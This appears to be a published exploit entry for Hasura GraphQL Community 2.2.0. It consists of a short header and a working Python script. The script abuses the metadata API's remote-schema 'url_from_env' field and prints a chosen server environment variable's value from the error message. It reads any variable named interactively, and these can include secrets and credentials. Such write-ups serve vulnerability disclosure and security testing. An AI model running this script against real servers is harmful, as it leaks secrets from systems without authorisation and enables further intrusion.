[webapps] Hasura GraphQL 2.2.0 - Information Disclosure

# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure # Software: Hasura GraphQL Community # Software Link: https://github.com/hasura/graphql-engine # Version: 2.2.0 # Exploit Author: Dolev Farhi # Date: 5/05/2022 # Tested on: Ubuntu import requests SERVER_ADDR = 'x.x.x.x' url = 'http://{}/v1/metadata'.format(SERVER_ADDR) print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read') while True: env_var = input('Type environment variable key to leak.\n> ') if not env_var: continue payload = { "type": "bulk", "source": "", "args": [ { "type": "add_remote_schema", "args": { "name": "ttt", "definition": { "timeout_seconds": 60, "forward_client_headers": False, "headers": [], "url_from_env": env_var }, "comment": "" } } ], "resource_version": 2 } r = requests.post(url, json=payload) try: print(r.json()['error'].split('not a valid URI:')[1]) except IndexError: print('Could not parse out VAR, dumping error as is') print(r.json().get('error', 'N/A'))